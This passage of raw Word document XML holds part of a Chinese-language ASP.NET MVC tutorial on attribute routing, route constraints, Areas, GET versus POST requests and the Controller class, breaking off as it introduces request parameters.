          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0070C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>RoutePrefix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"Admin"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    //访问Admin打头的控制器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>默认路由</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>我们也可以在一个Controller上去使用[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>]，这个路由将被用在这个控制器所有的action上，除非一个指定的路由[Route]已经被用在一个action上（也就是重写了在这个Action的默认路由）。</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0070C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>RoutePrefix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"Admin"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0070C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"{action=Index}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>//访问 Admin或Admin/Index，这个控制器下其他没有定义路由的动作方法通过方法名称访问。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>路由约束</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>路由约束可以让我们去限制怎样去匹配路由参数，例如</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>[Route(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"Create/{name:alpha}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>//限制name必须是字母</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>具体的限制列表如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="15"/>
        <w:tblW w:w="10042" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>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29"/>
        <w:gridCol w:w="5711"/>
        <w:gridCol w:w="3202"/>
      </w:tblGrid>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center"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Constraint</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center"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Description</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center"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Example</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alpha</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uppercase or lowercase Latin alphabet characters (a-z, A-Z)</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{x:alpha}</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bool</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Boolean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{x:bool}</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datetime</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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DateTime</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>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{x:datetime}</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decimal</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decimal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{x:decimal}</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double</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64-bit floating-point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{x:double}</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float</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32-bit floating-point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{x:float}</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guid</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GUID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{x:guid}</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int</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32-bit integer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{x:int}</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length</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string with the specified length or within a specified range of lengths.</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{x:length(6)} </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{x:length(1,20)}</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long</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64-bit integer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{x:long}</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max</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an integer with a maximum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{x:max(10)}</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maxlength</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string with a maximum length.</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{x:maxlength(10)}</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min</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an integer with a minimum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{x:min(10)}</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minlength</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string with a minimum length.</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{x:minlength(10)}</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range</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an integer within a range of values.</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{x:range(10,50)}</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regex</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regular expression.</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{x:regex(^\d{3}-\d{3}-\d{4}$)}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>Areas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> 我们可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>RouteArea</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>属性，去让控制器属于一个Area</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如果我们在同时使用用Areas和属性路由，Areas的路由基于我们在</w:t>
      </w:r>
      <w:r>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routes.MapMvcAttributeRoutes();</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AreaRegistration.RegisterAllAreas();</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routes.MapRoute(</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name: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"Default"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w: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url: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"{controller}/{action}/{id}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w: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hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">defaults: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> { controller = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"Home"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, action = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"Index"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, id = UrlParameter.Optional }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>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Get和Post选用哪一个？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GET请求应该被用于所有只读信息检索，而POST请求应该被用于各种修改应用程序状态的操作。用标准的话语来说，GET请求用于安全的交互(除信息检索外无其他影响)，而POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求用于不安全的交互(做出决定或修改某些东西)。GET请求是可设定地址的---所有信息都包含在URL中，因此它可以被设定为书签并链接到这些地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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Controller控制器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>System.Web.Mvc.Controller是大多数MVC开发者需要熟悉的，用来对请求处理提供支持的一个类。Controller类提供了以下三个特性：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>动作方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(Action Method)： 一个控制器的行为被分解成多个方法(而不是像Handler只有一个Execute方法)。每个动作方法被暴露给不同的URL，并通过从输入请求提取的参数进行调用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>动作结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">(Action Result)： </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>你可以返回一个描述动作结果的对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（例如：返回一个视图或重定向到不同的URL或动作方法），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>然后通过该对象实现你的目的。这种结果和执行的分离简化了单元测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>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pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接收请求参数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>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pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通过一组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>上下文对象</w:t>
      </w:r>
